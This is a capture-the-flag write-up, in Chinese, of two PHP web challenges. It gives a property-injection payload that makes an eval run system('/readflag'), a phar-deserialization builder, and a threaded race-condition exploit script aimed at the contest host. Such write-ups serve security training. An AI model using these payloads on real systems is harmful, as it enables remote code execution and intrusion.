2022DASCTF Apr X FATE 防疫挑战赛部分wp


2022DASCTF Apr X FATE 防疫挑战赛部分wp

warmup-php

<?php
spl_autoload_register(function($class){
    require("./class/".$class.".php");
});
highlight_file(__FILE__);
error_reporting(0);
$action = $_GET['action'];
$properties = $_POST['properties'];
class Action{

    public function __construct($action,$properties){

        $object=new $action();
        foreach($properties as $name=>$value)
            $object->$name=$value;
        $object->run();
    }
}

new Action($action,$properties);
?>

下载他给的附件,是一堆代码。分析可以知道,最后需要进入$object->run()中。

附件中只有ListView有run函数,但是ListView是虚函数,不可以直接new。

RUNOOB

分析可知,我们要new的是TestView类。查看附件的四个类,发现在基类Base.php有eval函数。

顺序是ListView->run()–>ListView->renderContent()–>Listview->renderSection()–>TestView->renderTableBody()–>TestView->renderTableRow()–>Base->evaluateExpression();

payload:POST:properties[template]={TableBody}&properties[data]=123&properties[rowHtmlOptionsExpression]=system('/readflag');

GET:?atcion=TestView

最后直接cat /flag没有权限,根目录下有/readflag。直接运行就行

soeasy_php

打开题目无论上传什么文件都会变成png格式。打开f12查看代码

这里非常可疑。我们把注释去掉后会出现按钮,点击以后再访问uploads/head.png发现变了,尝试是不是可以读取任意文件

我们读取源码

edit.php

<?php

ini_set("error_reporting", "0");

class flag
{
    public function copyflag()
    {
        exec("/copyflag"); //以root权限复制/flag 到 /tmp/flag.txt,并chown www-data:www-data /tmp/flag.txt
        echo "SFTQL";
    }

    public function __destruct()
    {
        $this->copyflag();
    }

}

function filewrite($file, $data)
{
    unlink($file);
    file_put_contents($file, $data);
}


if (isset($_POST['png'])) {
    $filename = $_POST['png'];
    if (!preg_match("/:|phar|\/\/|php/im", $filename)) {
        $f = fopen($filename, "r");
        $contents = fread($f, filesize($filename));
        if (strpos($contents, "flag{") !== false) {
            filewrite($filename, "Don't give me flag!!!");
        }
    }

    if (isset($_POST['flag'])) {
        $flag = (string)$_POST['flag'];
        if ($flag == "Give me flag") {
            filewrite("/tmp/flag.txt", "Don't give me flag");
            sleep(2);
            die("no no no !");
        } else {
            filewrite("/tmp/flag.txt", $flag);  //不给我看我自己写个flag。
        }
        $head = "uploads/head.png";
        unlink($head);
        if (symlink($filename, $head)) {
            echo "成功更换头像";
        } else {
            unlink($filename);
            echo "非正常文件,已被删除";
        };
    }
}

upload.php

<?php
if (!isset($_FILES['file'])) {
    die("请上传头像");
}

$file = $_FILES['file'];
$filename = md5("png".$file['name']).".png";
$path = "uploads/".$filename;
if(move_uploaded_file($file['tmp_name'],$path)){
    echo "上传成功: ".$path;
};

看到源码后就是phar反序列(unlink可以触发phar反序列化)和条件竞争。

先写phar文件

<?php
class flag
{
    public function copyflag()
    {
//        exec("/copyflag"); //以root权限复制/flag 到 /tmp/flag.txt,并chown www-data:www-data /tmp/flag.txt
        echo "SFTQL";
    }

    public function __destruct()
    {
        $this->copyflag();
    }

}
$a = new flag();

$phar = new phar('a.phar');//对phar对象进行实例化,以便后续操作。

$phar -> startBuffering();//缓冲phar写操作(不用特别注意)

$phar -> setStub("<?php __HALT_COMPILER(); ?>");//设置stub,为固定格式

$phar -> setMetadata($a);//把我们的对象写进Metadata中

$phar -> addFromString("test.txt","helloworld!!");//写压缩文件的内容,这里没利用点,可以随便写

$phar -> stopBuffering();//停止缓冲
?>

然后使用脚本进行条件竞争

import requests
import threading

def readflag():
    url = "http://6e13bae3-53a2-4071-ad00-2b66090f6e11.node4.buuoj.cn:81/uploads/head.png"
    res = requests.get(url)
    print(res.text)

def phar():
    url = "http://6e13bae3-53a2-4071-ad00-2b66090f6e11.node4.buuoj.cn:81/edit.php"
    res = requests.post(url,data={
        "png":"phar://uploads/a70dd6bce58ad760de7810d5e5c12f85.png/test.txt/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
        "flag":"1"
    })
    # print(res.text)

def linkflag():
    url = "http://6e13bae3-53a2-4071-ad00-2b66090f6e11.node4.buuoj.cn:81/edit.php"
    res = requests.post(url,data={
        "png":"/tmp/flag.txt",
        "flag":"1"
    })
    # print(res.text)

for i in range(20):
    t1 = threading.Thread(target=readflag)
    t2 = threading.Thread(target=phar)
    t3 = threading.Thread(target=linkflag)
    t1.start()
    t2.start()
    t3.start()

没有结果就多跑几遍


文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录